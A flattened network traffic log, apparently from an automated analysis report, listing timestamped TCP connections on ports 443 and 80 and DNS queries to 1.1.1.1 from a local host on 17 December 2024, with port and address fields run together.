                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.263782978 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.267684937 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.267785072 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.267796040 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.275753021 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.275846958 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.275854111 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.283684969 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.283765078 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.283768892 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.291580915 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.291709900 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.291837931 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.291856050 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.295532942 CET49810443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.295576096 CET44349810104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.295670033 CET49810443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.295902967 CET49810443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.295917988 CET44349810104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.521179914 CET44349810104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.521507025 CET49810443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.521533966 CET44349810104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.521909952 CET44349810104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.523118019 CET49810443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.523195028 CET44349810104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.523363113 CET49810443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.567342997 CET44349810104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.620255947 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.620306015 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.740112066 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.740125895 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.740145922 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.740187883 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.740255117 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.971710920 CET44349810104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.971795082 CET44349810104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.971839905 CET49810443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.972486019 CET49810443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:16.972505093 CET44349810104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.213109016 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.213228941 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.213289976 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.217240095 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.217823029 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.217888117 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.225717068 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.227874041 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.227943897 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.234157085 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.234431982 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.234487057 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.242455959 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.242604971 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.242671967 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.830604076 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.830650091 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.830719948 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.830986977 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:17.830996990 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.047008038 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.047420979 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.047462940 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.047844887 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.048216105 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.048301935 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.048404932 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.048523903 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.048553944 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.048693895 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.048723936 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.766153097 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.766369104 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.766522884 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.766544104 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.766582012 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.766634941 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.766642094 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.766752005 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.766810894 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.767497063 CET49812443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.767528057 CET44349812104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.770888090 CET49813443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.770982981 CET44349813104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.771090031 CET49813443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.771321058 CET49813443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:19.771351099 CET44349813104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.128814936 CET49814443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.128860950 CET44349814104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.128958941 CET49814443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.129271030 CET49814443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.129281044 CET44349814104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.980746984 CET44349813104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.981226921 CET49813443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.981247902 CET44349813104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.981515884 CET44349813104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.981895924 CET49813443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.981941938 CET44349813104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:20.982067108 CET49813443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.027322054 CET44349813104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.344933033 CET44349814104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.345350027 CET49814443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.345374107 CET44349814104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.349277020 CET44349814104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.349467039 CET49814443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.352372885 CET49814443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.352391005 CET49814443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.352436066 CET44349814104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.352454901 CET49814443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.352520943 CET49814443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.354269981 CET49815443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.354325056 CET44349815104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.354397058 CET49815443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.356220961 CET49815443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.356235981 CET44349815104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.436671972 CET44349813104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.436759949 CET44349813104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.436817884 CET49813443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.437720060 CET49813443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:21.437741995 CET44349813104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:22.594877958 CET44349815104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:22.595223904 CET49815443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:22.595253944 CET44349815104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:22.596278906 CET44349815104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:22.596446037 CET49815443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:22.597460985 CET49815443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:22.597522974 CET44349815104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:22.597678900 CET49815443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:22.597688913 CET44349815104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:22.642940044 CET49815443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.526350975 CET44349815104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.526670933 CET44349815104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.526863098 CET49815443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.527522087 CET49815443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.527545929 CET44349815104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.679166079 CET49816443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.679270029 CET44349816104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.679368973 CET49816443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.679682016 CET49816443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:23.679713011 CET44349816104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.918452978 CET44349816104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.918965101 CET49816443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.919001102 CET44349816104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.920027018 CET44349816104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.920114040 CET49816443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.920416117 CET49816443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.920417070 CET49816443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.920484066 CET49816443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.920490980 CET44349816104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.920553923 CET49816443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.920888901 CET49820443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.920984983 CET44349820104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.921130896 CET49820443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.921448946 CET49820443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:24.921479940 CET44349820104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:26.132409096 CET44349820104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:26.132735968 CET49820443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:26.132767916 CET44349820104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:26.133919001 CET44349820104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:26.133989096 CET49820443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:26.134299994 CET49820443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:26.134387970 CET44349820104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:26.134471893 CET49820443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:26.134480000 CET44349820104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:26.183964968 CET49820443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:27.041322947 CET44349820104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:27.041404009 CET44349820104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:27.041475058 CET49820443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:27.042781115 CET49820443192.168.2.18104.21.65.72
                                                                                                                                                                                                                          Dec 17, 2024 18:21:27.042824030 CET44349820104.21.65.72192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:28.079873085 CET4969180192.168.2.18199.232.210.172
                                                                                                                                                                                                                          Dec 17, 2024 18:21:28.142947912 CET49715443192.168.2.1813.126.107.86
                                                                                                                                                                                                                          Dec 17, 2024 18:21:28.142976046 CET4434971513.126.107.86192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:28.200421095 CET8049691199.232.210.172192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:28.200608015 CET4969180192.168.2.18199.232.210.172
                                                                                                                                                                                                                          Dec 17, 2024 18:21:37.947439909 CET4970380192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:21:37.947498083 CET4970380192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:21:37.947501898 CET4970480192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:21:37.948359013 CET4970480192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:21:38.068253994 CET804970376.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:38.068290949 CET804970476.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:38.068309069 CET4970380192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:21:38.068350077 CET4970480192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:21:41.159540892 CET49899443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:21:41.159590006 CET44349899142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:41.159667969 CET49899443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:21:41.160238981 CET49899443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:21:41.160263062 CET44349899142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.614207983 CET4434971513.126.107.86192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.614381075 CET4434971513.126.107.86192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.614453077 CET49715443192.168.2.1813.126.107.86
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.663163900 CET49715443192.168.2.1813.126.107.86
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.663219929 CET4434971513.126.107.86192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.870450020 CET44349899142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.870826960 CET49899443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.870851994 CET44349899142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.871171951 CET44349899142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.871485949 CET49899443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.871567011 CET44349899142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:42.926985979 CET49899443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:21:52.604799986 CET44349899142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:52.604887962 CET44349899142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:52.604948997 CET49899443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:21:52.632764101 CET49899443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:21:52.632786989 CET44349899142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:22:13.723575115 CET4969080192.168.2.18192.229.221.95
                                                                                                                                                                                                                          Dec 17, 2024 18:22:13.723577023 CET49688443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:22:13.844261885 CET4434968820.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:22:13.844311953 CET49688443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:22:13.844373941 CET8049690192.229.221.95192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:22:13.844419003 CET4969080192.168.2.18192.229.221.95
                                                                                                                                                                                                                          Dec 17, 2024 18:22:18.586250067 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:22:18.709110975 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:22:18.709188938 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:22:41.216512918 CET50146443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:22:41.216546059 CET44350146142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:22:41.216635942 CET50146443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:22:41.216908932 CET50146443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:22:41.216923952 CET44350146142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:22:42.906054974 CET44350146142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:22:42.920368910 CET50146443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:22:42.920381069 CET44350146142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:22:42.920841932 CET44350146142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:22:42.921413898 CET50146443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:22:42.921494007 CET44350146142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:22:42.971045017 CET50146443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Dec 17, 2024 18:20:36.556231022 CET53603771.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:36.567672968 CET53515891.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.103549004 CET6391953192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.103703976 CET6494453192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.450498104 CET53649441.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.522907972 CET53639191.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.754374027 CET5478153192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.754589081 CET6197953192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.892355919 CET53619791.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.892471075 CET53547811.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:39.293176889 CET53652081.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.672939062 CET5024253192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.673178911 CET6375353192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.810760975 CET53646161.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.812486887 CET6310353192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.812666893 CET5743653192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.108767986 CET5275153192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.108930111 CET6158053192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.110616922 CET53574361.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.130084991 CET53631031.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.246155977 CET53527511.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.246467113 CET53615801.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.425456047 CET6005253192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.425614119 CET5475053192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.153918982 CET6255253192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.154071093 CET5417153192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.662528992 CET53541711.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.662906885 CET53625521.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.328459024 CET53640311.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.172755003 CET6527753192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.173038006 CET6130853192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.173927069 CET6272853192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.174074888 CET5505353192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.174352884 CET5842353192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.174468994 CET6042053192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.311371088 CET53652771.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.311516047 CET53613081.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312644005 CET53550531.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312822104 CET53584231.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312833071 CET53627281.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.313148975 CET53604201.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.304064035 CET6055253192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.304208994 CET5756353192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.440994978 CET53575631.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.441543102 CET5779853192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.441747904 CET5564253192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.444235086 CET53605521.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.579879045 CET53577981.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.581062078 CET53556421.1.1.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.956562042 CET5935053192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.956700087 CET5646453192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.972873926 CET5193853192.168.2.181.1.1.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.973169088 CET6235653192.168.2.181.1.1.1
